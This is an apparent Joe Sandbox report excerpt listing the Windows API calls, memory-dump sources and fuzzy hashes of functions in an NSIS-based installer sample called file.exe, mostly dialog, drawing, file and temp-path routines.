                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                              • SendMessageW.USER32(00000000), ref: 00404818
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                              • SetCursor.USER32(00000000), ref: 00404897
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                              • SetCursor.USER32(00000000), ref: 004048B3
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Exec$N
                                                              • API String ID: 3103080414-17853963
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                              • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                              • wsprintfA.USER32 ref: 0040621C
                                                              • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(00000400), ref: 6FF61B96
                                                              • lstrcpynW.KERNEL32(?,00000000), ref: 6FF61BA4
                                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6FF61C03
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF61C15
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 6FF61C22
                                                              • CloseHandle.KERNEL32(?), ref: 6FF61C31
                                                              • CloseHandle.KERNEL32(?), ref: 6FF61C36
                                                              • ExitProcess.KERNEL32 ref: 6FF61C3B
                                                              • ExitProcess.KERNEL32 ref: 6FF61C46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                              • String ID: "$D
                                                              • API String ID: 2956148522-1154559923
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                              • GetSysColor.USER32(00000000), ref: 00404598
                                                              • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                              • SetBkMode.GDI32(?,?), ref: 004045B0
                                                              • GetSysColor.USER32(?), ref: 004045C3
                                                              • SetBkColor.GDI32(?,?), ref: 004045D3
                                                              • DeleteObject.GDI32(?), ref: 004045ED
                                                              • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                              • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                              • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                              • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                              • CharNextW.USER32(?,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                              • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-2246974252
                                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FF610E0), ref: 6FF61990
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FF610E0), ref: 6FF6199E
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6FF619BD
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6FF619E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                               • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentHandleModuleProcess
                                                              • String ID: IsWow64Process2$KERNEL32
                                                              • API String ID: 977827838-1019154776
                                                              • Opcode ID: 55ea944f631694e8ea88137a4be0121e0caadd98b18876f9735b4e61095aaf42
                                                              • Instruction ID: 4e365d8a0a6bdf5798ff94db1e6b80fbc6c7e21a570401b99834a00ac72d7de7
                                                              • Opcode Fuzzy Hash: 55ea944f631694e8ea88137a4be0121e0caadd98b18876f9735b4e61095aaf42
                                                              • Instruction Fuzzy Hash: 0B015E76D00609BADF01DFF48C45EEFBBBC9F05654F008162A911E2281EFB5EA05CBA0
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                              • GetMessagePos.USER32 ref: 00404EB4
                                                              • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                              • MulDiv.KERNEL32(0002F000,00000064,000B7218), ref: 00402FE1
                                                              • wsprintfW.USER32 ref: 00402FF1
                                                              • SetWindowTextW.USER32(?,?), ref: 00403001
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402FEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                              • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                              • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                              • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                              • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                              • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                              • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                              APIs
                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 3248276644-2857754586
                                                              • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                              • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                              • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                              • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                              • GetClientRect.USER32(?,?), ref: 00401DEA
                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                              • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                              • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                              • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E56
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                              • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                              • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                              • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
